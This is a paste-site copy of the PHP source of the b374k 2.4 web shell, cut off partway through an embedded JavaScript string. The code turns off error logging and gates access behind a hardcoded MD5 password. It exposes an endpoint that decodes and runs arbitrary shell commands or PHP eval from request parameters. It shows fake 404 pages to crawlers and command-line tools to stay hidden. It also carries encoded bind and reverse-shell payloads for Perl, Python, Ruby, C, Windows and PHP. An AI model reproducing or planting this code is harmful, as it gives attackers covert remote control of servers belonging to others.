· 6 years ago · Mar 28, 2019, 03:50 PM
1
2<?php
3/*
4 b374k 2.4
5 Jayalah Indonesiaku
6 (c) 2013
7 http://code.google.com/p/b374k-shell
8
9*/
10
11error_reporting(0);
12@set_time_limit(0);
13@ini_set('display_errors','0');
14@ini_set('html_errors','0');
15@ini_set('log_errors','0');
16@clearstatcache();
17
18$s_name = "b374k"; // shell name
19$s_ver = "2.4"; // shell ver
20$s_title = $s_name." ".$s_ver; // shell title
21$s_pass = "bc2cd23afb1eeabcbf34b6c80f24f011"; // shell password, fill with password in md5 format to protect shell, default : b374k
22$s_login_time = 3600 * 24 * 7; // cookie time (login)
23
24$s_auth = false; // login status
25if(strlen(trim($s_pass))>0){
26 if(isset($_COOKIE['b374k'])){
27 if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE['b374k']))) $s_auth = true;
28 }
29 if(isset($_REQUEST['login'])){
30 $login = strtolower(md5(trim($_REQUEST['login'])));
31 if(strtolower(trim($s_pass)) == $login){
32 setcookie("b374k",$login,time() + $s_login_time);
33 $s_auth = true;
34 }
35 }
36 if(isset($_REQUEST['logout'])){
37 $reload = (isset($_COOKIE['b374k_included']) && isset($_COOKIE['s_home']))? rtrim(urldecode($_COOKIE['s_self']),"&"):"";
38 foreach($_COOKIE as $k=>$v){
39 setcookie($k,"",time() - $s_login_time);
40 }
41 $s_auth = false;
42 if(!empty($reload)) header("Location: ".$reload);
43 }
44}
45else $s_auth = true;
46
47// This is a feature where you can control this script from another apps/scripts
48// you need to supply password (in md5 format) to access this
49// this example using password 'b374k' in md5 format (s_pass=0de664ecd2be02cdd54234a0d1229b43)
50// give the code/command you want to execute in base64 format
51// this example using command 'uname -a' in base64 format (cmd=dW5hbWUgLWE=)
52// example :
53// http://www.myserver.com/b374k.php?s_pass=0de664ecd2be02cdd54234a0d1229b43&cmd=dW5hbWUgLWE=
54// next sample will evaluate php code 'phpinfo();' in base64 format (eval=cGhwaW5mbygpOw==)
55// http://www.myserver.com/b374k.php?s_pass=0de664ecd2be02cdd54234a0d1229b43&eval=cGhwaW5mbygpOw==
56// recommended ways is using POST DATA
57// note that it will not works if shell password is empty ($s_pass);
58// better see code below
59if(!empty($_REQUEST['s_pass'])){
60 if(strtolower(trim($s_pass)) == strtolower(trim($_REQUEST['s_pass']))){
61 if(isset($_REQUEST['cmd'])){
62 $cmd = base64_decode($_REQUEST['cmd']);
63 echo exe($cmd);
64 }
65 elseif(isset($_REQUEST['eval'])){
66 $code = base64_decode($_REQUEST['eval']);
67 ob_start();
68 eval($code);
69 $res = ob_get_contents();
70 ob_end_clean();
71 echo $res;
72 }
73 else echo $s_title;
74 }
75 die();
76}
77
78// block search engine bot
79if(isset($_SERVER['HTTP_USER_AGENT']) && (preg_match('/bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i', $_SERVER['HTTP_USER_AGENT']))){
80 header("HTTP/1.0 404 Not Found");
81 header("Status: 404 Not Found");
82 die();
83}
84elseif(!isset($_SERVER['HTTP_USER_AGENT'])){
85 header("HTTP/1.0 404 Not Found");
86 header("Status: 404 Not Found");
87 die();
88}
89
90// resources $rs_pl $rs_py $rs_rb $rs_c $rs_win $rs_php this was used with bind and reverse shell
91// use gzinflate(base64_decode($the_code)) if you wanna see the real code.. in case you dont trust me ;-P
92$rs_pl ="lZLxj5MwGIZ/Xv+KyvU2SLhj80xMVllcGJrlvLHQncY4JQw+BzlGCe3pzG7+7bbIOaIxUX7q9/bL8zZPOHvi3Iva2eSlA+UXXEFdoDOcSVmJseMkPIXLLefbAi4TvnMqZ3P1/NndhcigKBx0LwDPg/GY8eQOJEWEC5d8CtRBZK4B+4rXEq/88MbdS6h3dMlG7mBNlu9m68mAtvcqpE2/yPBFblCUfzY16PvO+arS3Do0tHMvuGFL3zvHzrVBj4hIdwuyqrnkm29lvANzIJNqYFEkmteYzO4vX0Xzhb+y+yzwriO2Cv3pjU2k9fCQ5mBaTdXLafj6reuOrAPqkcolevww/EhRT4DUKF5pFgveRJqiaCyIQv+W+dPZLLRHitJTr0/Vjt6O07SO8tIklT1f6I1ounhvnRp7RS4klGr7qhPGSQKqxrOZ1RQrnGcbjWvcuMZjnPCyhERCui4Ne6j3eAUlZqvZfGEbL/qeQR+D4HZlG5Nu4odhm6Ae7CHByumpPim4ANOz6M8D+3XQ7M6guJ1JMa0Gl0s8pAgdERTiZPTpn0ZJ1k6jZsrdvAQZxZIrX1lHB4nd31ySvHPdmlAOSdyJG23s37SZrbZJnxkWfUxab92oFaejv5v7L2GNJjhobab6e45IfT8A";
93$rs_py = "lVRtT9swEP6c/IpgpmGrwaGFaVJZKiEIE9qAqu20D8Cq1LkmEalt2S6Ufz87SV9ATGiqWveee3vOd+f9vWipVTQreQT8KZAvphDc3w8KY6TuRxETGdBciLwCysQiktHs+OvJ46EuoKoiv1xIoUygINTLmVSCgdah0KF+sV/BHsGEplyAL2OE/ML9ZDAPamfMSN/3nE+89aVDIYFjFtYm8UQtbWSTiaV5ZXQ1TBwMSr0Hl/wtSnxPgVkqHjiUNhGpgjTDpLOGbLQdaCENJn5NN2WmFLzhW84DoSlPF7AXI26Qhbx5zOi8rIAL6+F5Vm/LN7DACFb19UyS0XW8MqAWp8NxNz74NPx9MTg4bbUWOq0boIvgsAy+fUYdbRSekw4KBrtCbyvZPFBpcNmfC5s6cDflJM+ol/r0lGWlgD3h7lHvxPHyYMVAmkYrU61rrI3iucpsCViRwVEDeLNYAdWQKlZgxLL7AN/9udcPHYJCFc6rNNfO4Or7ze0oOT8bJ6Rxs4FmbYT2umRqClrqrFR4RnMllhJ3CVnbuAtjxRtlq7ONAZ7hdT9aeEvaOrvRqOdJkZ2kSxOkPKsrsv9dTW0oJ/mbIEE7FpeplZpur3P1NzOD7jnqWJI5GPbsxgMNkJ/Htsk0VfmT395cTuK450Y6zu+6Dz5UO/jxFvcKe/ac3uaHVWlsuXY/Sm6wJL6Om7WhzYFb6exyenWTTNqdouPb8x/T8WSUnF1bF1uYcQohN/bj259TZ7TrMh0lv8bJ2cXFKLQZ35DW1E5ghjE6ovUHhdLdtqZVaUeZ4y+vPFw5btAC2znBOTCDcdF4bIfMLT7VFYB03pumvbdBnm6ag+rHpXkfgn7QxobMNsA1bdP3D8xRZ3dg2vXVxG/9HXP7xKQktg1kji7+F/HuR8TZ/xH/wPxd4oz4fwE=";
94$rs_rb = "tVZrb9s2FP1M/QqWySprcaSm6zDMmWL0sQ4FVtRI0w1DlRU2dW0RkUmNpOoUSfbbx5ccu7aTDNhoGJTuPbxP3mPvPcpaJbMJ4xnwz1i2ky/RHq60btQgy6goIZ0JMashpWKeNdnkux+eXRyqCuo6iyT81TIJOFaCXoCObwXNWFd8PIc4ikqYYtXSCxUhCbqVHJ9+ePHHp9Gvz89evzt9m5ZiwelYQTofa1r14rlaMH5tv3PGZ4s4GWrZwmA6rhVEwEtvUcK4tk56SsvEWM7NHiE2xa+ZiRUumdJqGJRGOwrxpBwWTpp2BlItPpnQrGF73EWKdQUcy1ymM9VOelmRZX1SFCTBDhbSkD4ac+j56S+/pTXwma7y/CjCZlnRxyfn+d/Znx+fHP54fnXU//5mPxs2+RuuYQayFxDJwASr3RmVn70cvQf5GaSLk5B+kzgNzVU6phQaD6RpIxnXmLhuYNcNPMBUcA5UQ1lw4nATmDHunuwygXKhQy/wyprm1FaBrQnhEihWzs+0R+CyEVLjs59P3+aXGuT8ePT+KI+L/dHvr4qT+DjojfDY3SVV4UOGi5+Kx9+UuDhx21O/k/7UfpKlN7CNXXXdpbfsMUlJckBOyBpqUZlO49rEPgO9npBdcswUYJBSyBdS2ORr24ySQSGH+9kGPlSnTmkl5k2eE7IBCTBrh5Y4/TZjWyF21Xkd7o5BZqwfx4k3vPNEd3VLMz9UC/ll2KuTnWjvY1mge5CvmDTejeW7gPYy79I9rCNLS7UKZSoWgzvLtC1pX6cHJ3Qf/D9NC3aaevMubUQDvFf3iSTJ1TUT1515JizblAfEzOXBhq+b7c62hP21bPW9e5agaHt77w35LekFuGrlbQYqpbVYyUjlnNVRZ8v3cI3YnjqC3EFsxtEmtR0baZW7t6Nzw7G2gCEgT7ie8dyPh2e8vavqxrEeUg/gOOQJDqE1akMITQ1fOkZD1t3/TWSoy2wZ9OaFMsqOsJQnLCNB95CUix9tYSYU5KtU5GRoN/Gg7tAWmkHd4VVGCcI18vAi1zu37kzY1eUrJtgdRTfIm27XNf/GOQTktulUD5zONadh91v4M7B14FCYNhulnzPz5CYMhfHyk+fAVvIP";
95$rs_c = "rVJhb9owEP0Mv8JjU+tQFxPaaVJpKqFCJbQVEGSapg1FwTHEqrGj2EzQqf99thMYYdqkSf0Q5e7d8zv73uEmSLXO1A3GRCa0tZJyxWmLyDXO8OLqw/XTpUop5xg0cf0tE4RvEgpulU6YbKV3FShnYnWKJZwtTrCdwnqXUfUnrCR5orqKC6qZ+TATVXwjmFG3GBMarGMmoA3ifEUQSeMcNE3449vc+1mv2YJCBMnA79Zr5qIbYgDTLE6SPGICMAOzJbSHg6Bjj9RYSzERLeM147ug9xANR4Owe8Azmesg1VIoGGvJoOvlzz3vN8Vqt5T7OSaHw1Gv359GvdFXR1NB8V5YqqPZ+P5jNAung94jahcUqi1HZhoqU/4UWYpjRtPB59nA6qEziRR7pnIJZdl/Cd8oj26ZhoXMgonECMCTl4Omd8ZQe+sXLG4GSoXhvXcpCWJCqOvcPlzH6BDUcHsB3F6AG0CkEJRomnwXDdS5LrnJJusYbiXxj5NOIbkzTdewQbd2pCAcTB+Drab5ujuZ+cH5u8mX/t15t6wayISUAGxehFUKLlmjuCuXikJi45d6jXJFwcHOq9e30y6kiwpiZ15M+Znmco8gM2tuprknXPgXx8he+587MJxMpuNwHIX3k72vsBz2X90sN+Gk5nnebft4I5yT6j+cVNXEP05e30lVOPlS/wU=";
96$rs_win = "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";
97$rs_php = "7VRNj9s2ED3bv0JRCayEai3LDhBgXW4u7bFA0BboIbsRZIqyCEsiy6FqB9397x2Skj82zm6QBr20MGxTM5w3X0/vh7eqVtPvgtoYBTdpymTJZxspNw2fMdmmKl0v37zeXkPNmyadcq2lzjVXUhvRbaJ5vJoCN7kRLc8b0QrjTHKdi1Y1ggmTV00PdYTGKTGF3nBDiQZ/Wo0moHyvGkwdhUGYDEYMIQxotly+wdOuoF3fNHjihxPUNMRArCX47adffqZ7w3W7evdrRq/uyLvff7y9Wg1utK3StehSqINrEWJsS0PXWeA6C24CJruOM8PLuw79U1FFTPadicYSY0qz+K/phChKxvInBCsI7b9BONGVeH6c8gb4pfDFeTi8n997iIMhux+xCrZ1WLaOqu+YEbLL+V6AgehKsc40eSX19ir2mKKkR6Md9gTjnJleZzHGmSg7sXrLfLAoCWKf4xpBlFF8HuErwJKG/lw6oGA0L9ocJNvi9oHrP7mOQsMUUmg+c5+bcEZUQpAxnXR/GGMTjqEDa2SPM4Jk6Yoh7AlywRhX9sJQKnqNbOQOs0G/xqcI6Zv3XdHyKE7myTLG+sOd6Fyhk2qnheERYQlpZzhhtsMGZ+FtaOEmu1o06FSvKK0K3JkLsQuq7DIwyt1yE9J8k7eFYXUUpqy8C6L3H+7g/vs4FUhX7FLr2EdPSFkiwbVfpY8WkJdCR+iJY1aPR+8mkp7W5YyP9mcgkdGiPe2aKNeh3U8YPDwEn/H/0aM/DtY4y+1qhAswGd/bjjEXsnz2SeaTeUlXoC2lYo0EPo5jfHIbQbcFfjpqd5GUQAuti4/RnN76Q6iE4mES6jBOsqfGHRoXF4weTGmqtGS5VLzD5HWC8Dh5oZwbB/UKp6w5yF4z2yHu48j6U86tG2SWlS4bjG9gMn/+RvbijcWzN9jg9GQzuh9oZt9rLis71ocHf/Lp4vi4NaKLYYZ2rkM5Q1JPoEPOBrUrwvsJKiW+bkViNfJAYNHlRxxdHMgqaIXxpTMzGDg5rnIYEBHxkZZnWGNBlwBH3yeo7AXAxTOAi5cBH885ekLe8ejbOn/OnjwP43WUG83aM/6g714UrVAPolhZ0fIErZ0q8A6/o7Z9vXrBV6kX/GfVCy6p1+f0Cv7Xq7Mb8JJewZfpFXwjvYLLagD/ml7Bt9Yr+BK9+sci9fZ2+jc=";
98$favicon = "AQYD+fyJUE5HDQoaCgAAAA1JSERSAAAAEAAAABAIBgAAAB/z/2EAAAAEZ0FNQQAAr8g3BYrpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAphJREFUOMudk8lPU1EUxvkbXAMdXlug2Kp0eu8ViiUIC2wZJJYqkwUqFiqUMjqgAQppUnAIiBKmFoq0thYKBI0GBGMw0ejGxIVLdyYmYDQ0xPD5HokopmXh4kvuyb3nd853ck8cgLhYylymkblIadlzxmNVUXpAuf3vmwOB9pma+DvWhElkhFRhy4Cer/YpaugZ+bdDASfZiktU8+84PaiKqP3Kr+YbOd6CXnqbHpPtltjUzpgAzQK5mTFPRvZaDpBb9KwClFcOyi1H53oT1j+H0O6qgK4mrSUqgPGpTX+khMZHbuYFTiH4YRxPPk5j4KUDklvJqFjOh//1ME70H8VxZyqkDjFTdZ7cYnzue2d87mZ6Kcy+u42epyZcDZegNVwJzTAJiTMFpmkDsgtEn/Y7YHzuMD5BP1R4NF7yy9lgAbxv+3FzqRz2YD7KprJg9BfC92YEQ6sDkHanQG0Uhg5YoKblG6RbBnJchsD7QXQulqIpoEeZWwvDjB731xywzxrwYKUXkk4xxB2i7ymtQuuBGZCjsojRVwTXcysa/TqUTmSh2HMa91a7YZ0qRNVYLgNwQtwmQrJdsJvUSEBUz/8zQNVQ2o/aoAl3VtpQNpmNMxN5cC22w+LRwzSaC8e8DQ2TFiTZBEiuJ46wOYSZe20fQN9V9KW5JOhaakPxuA6uhQ5Y3DpUjuSgZ84G6roSostM1TqiOuY/kPUdWyOauRh7MYiuUD0uMqCeuUZcmWmBsI4PQS0PRA03wjdxmqMCWEmvitekHWI0uGth99RBahPvJQrNvGomUcurSNzkliaAcy6eiApglWoXuZOs/J+CS0xFMxf8Ks6rWAsXd9g2suJf4GzwyhPBPZ9A/BeAFccYv5NoiN+KdvcLtyxxEwhxgvoAAAAASUVORK5CYII=";
99$style = "rVbbjpswEH3vVyBFldoKEBCa3YX3fetjP8CACVbBRmboJov493rAEHNJVpVWfkEwnsuZM2f40eWCg5OTipXX6HfScmitX4ILu6GS5X0ismuXkPTPWYqWZ9HB87x4uNKwdxr5QX2JU1EKGR3yPB+/vFF2LiAKPa8vZJcImVEZ+fXFakTJMusQBEFPOn0rTJ+PJI+BXsDJaCokASZ4xAWnPYkK8ZfKyfT19bWvJe1qkmWMnyPPeq4vfS5k1WWsqUtyjRgvmboIJCmpBYVdd2krG3U5ozlpS+gPFWF8UZDv+7FTiXdnTNSRJGNtE/meqmzn1RvLoFCP3td4ykNhMGRyKChR5t1QCynZmUclzSGuiDwzHnnzBW8ytSDrHnwt/O4GdYDRFbbJHwYOSMIbrDySAgjQb45/dI9PGT1/H4t5ZPAwokVsl15qBTgtWQNjB6y5XarJCkPK2w2Gk1cL4QgRDkkbBXn3H+BuuaLpgV11ipFX/gktV9F1eoSQWyIDP+YiQ90lF0tlPBeamQ72aCekdnMyXGBl6BYzGP1AUjYWyE6nFqggscILWEpKTYGKZVlJe/dMrgpag846jjkyT2pkBpNP6XNJAVR9TU1SnX3vYusqtmhe8IIn/ngedxyupeBT8t4hTLjhC77ZEHnu8Vimlg+z2OMJz/08P0pz/t67jNctvNtuLUVVg+3CBYikZDMYmtTeVEAiAERlMu74gueBrBoE7HW8bsObKb6hUJqWxycPL44JJy10q0iLjF/wrNiwq+G3QcNpn0Sj2xFIbIs3Wygx2VX7+bsSxbtQYVxTDPYmDkQdL3fEzXWxxm1RPHqfbp4mLs135Q6f/Gc8vdvQSu3OK5s30TAwO0rrovRYw4IyoVqS+/RIC7XTAdTZ8fPYYHRd2KrKbY5boRnNH4OtrYrA3Gop5UoHTL7+XLMoxbMWjNNmio032/A79S4U3ffmouf9lKapUlBG33K2C/A+o4yVMXB5cvAhFXdgNolpLo6F41RBp0Ccf2V8f1auayIun7Iz7+MWLoJhc+/3IAxXWrDltKWHjAtg+YJ5+op2gL+O2/av51H7Py7orTO2gjnOreUecjkXApa/XhI9mhxFsHY2mPZijv5qw9sjTurJINRIPFuPhz89yIUA9F/+AQ==";
100// http://www.kryogenix.org/code/browser/sorttable/ - this makes the tables sortable
101$sortable_js = "vVhtb9s4Ev4eIP/B0XUNEZZlO+19ONPcYNMXbHHd7gFb3H5w3IKiaFmJLLkSnWzO8X+/GZJ680vW7eG2QGO+zTPDhxzOjO553lmwi6F3yy5G9PysyHKleJBItpHj+ToVKs5Sl2x4Hq2XMlWFL3iSSOnHT0/u/iBbeHfdrkgkz9+nSub3PHHviBdmQi/0RS65km8Tib1utxqPpLKDxfXjJx595EvZ7bqVNT5ng8/uTXgTXpHpzeDG7892erpLrvTfFwMvcZ/Fdh0N6xCv2iMnm/7ognFfJLwocJFfwDbEwh3cBGgICtwEA9Lt1mbdgdiWELL17sZNpCEDoCOKF5KHDvETmUZqAZuEAXaYoGqxB78+X61kGr5exEnocj/PHorpcEY87sdpIXN1LedZLhENhuZxXii9lBCarpME7VE/AxgotK0/sxDR4UbEc3dUSWu11nSyQR6CTKlsicNsOqNggnsPVypgQxpMeHM5DXo9YhjWtgezo0wbTMO121YybXct9qwGJRQMbi8im4qBd1mmkPJ5dpzyOaxxkNcm4TAKTOL2zNYOmqG3CCtbkjv2o4WhTKSSnfbMFlmHRotqOANfyCQpGqrtuqZO2PKFHW7zuuSqplVf2S9phm0kl2zcJUyzUyXdKe//Z9j/x6xHtHi3e37mZvcyz+NQMoSajmB3DbiVHu12ndI3HMbU40pm804FO3Ww+cXplUizq2fmxrXv3brcC1rqMhY0uwKpvM7CWCKPFO+laGzWk6wG+8oajx3QiRdVLeLi6B01lGBLhpqNGiuXYG2Brojy6LxNnF3YXK4SLsDtdlEdb2/oi4V2LGgul8CMuWcH3rvrx/fhLu78IYxT8G7iYQ/woHfUF4oVT53mSj8O2Q6gmXA8EzvKZWkq858//fKBOd00KFa0+7c/Lv9+/Yo6xvBdBzFihMqkkJ1vpb9k5f9zDBXn+8fxPxyDZc0egzmUU47BrDxwDPZcW4sOH8LbY4dgxMwhbFT5HOmlK56DJR+zUNLELad8gaI4WMDpN8OfDhgpTHwCZ9cRp+adfyPp+in+RnEtBoGZuofYPdFBTJy3XNYEtE67SZt7yKFOvAVGl3WeZ3SVftK+vD3mdPYooCdfLHrKxaIHL9b52e7Vos9eLbg1X3ie80dMFkSWmNuVUZ0/mE3puFclEhxCHp80YyyHeFfBTKtWlQlM6xcgdHUM5TaGTkEhJEx2bFYb46OIeSdWwG1gLdFGVAa01GgrVNDaZ20Un+lAaMN